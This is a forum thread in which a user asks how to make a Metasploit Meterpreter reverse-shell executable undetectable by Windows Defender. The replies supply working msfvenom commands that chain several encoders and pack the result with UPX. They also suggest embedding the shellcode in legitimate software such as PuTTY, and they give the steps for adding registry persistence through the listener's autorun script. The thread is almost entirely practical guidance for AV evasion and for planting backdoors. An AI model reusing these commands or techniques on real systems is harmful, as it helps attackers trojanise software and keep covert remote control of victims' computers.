Forum Thread: Windows Defender Pick Up My Payload

hi i need some help with creating a undetecable paylaod
the script i am using is
msfvenom -p windows/meterpreter/reversetcp LHOST=10.0.0.2 LPORT=4444 -f exe -e x86/shikataga_nai -i 200 > xxx.exe

after i create the payload i move it to a windows 10 64bit and its immediately pick it up .
i was wondering maybe it cuz of the x86 encoder ? even when i use veil-evasion the windows defender get it.
are there better encoder / crypter known in kali then i am missing ?

the only way i get pass my windows defender is by usnig shellter but then i dont get a meterpreter shell back ...

7 Responses

Use veil-evasion, very similar to msfvenom. In my experience much higher success rate with veil-evasion against AV.

i dont know why but veil-evasion cant pass my windows defender

Well, the most straight forward solution would be to create your own shellcode and embed it into a legit software(i.e. PuTTy). But, what else you can do is to encode it multiple times( like this:

msfvenom -p windows/meterpreter/reversetcp LHOST= LPORT=31337 -f raw -e shikataganai -i 5 | msfvenom -a x86 --platform windows -e x86/alphaupper -i 4 -f raw | msfvenom -a x86 --platform windows -e x86/shikataganai -i 6 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 5 -f raw | msfvenom -a x86 --platform windows -e x86/shikataganai -i 9 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 9 -f exe -o /root/.exe;upx -9 -v -o /root/.exe /root/.exe)

and add a -k option and add a program of your choice to run with the payload.

tried the script... windows defender still eats it up... any other suggestions?

combining the payload with a legitimate exe will get past defender. however persistence connection (as far as i know) requires the payload to be uncombined and THAT gets chewed up by defender. any other ideas?

For persistence, use the Registry persistence exploit. Found in Exploit/Windows/Local/registry (underscore) persistence

I like to set it up in the listener so it automatically gets persistence when a session is created. After typing your listener info and before typing exploit -j , type set autorunscript exploit/windows/local /registry-persistence Lhost=IP Lport=port

Then exploit -j

Share Your Thoughts

  • Hot
  • Active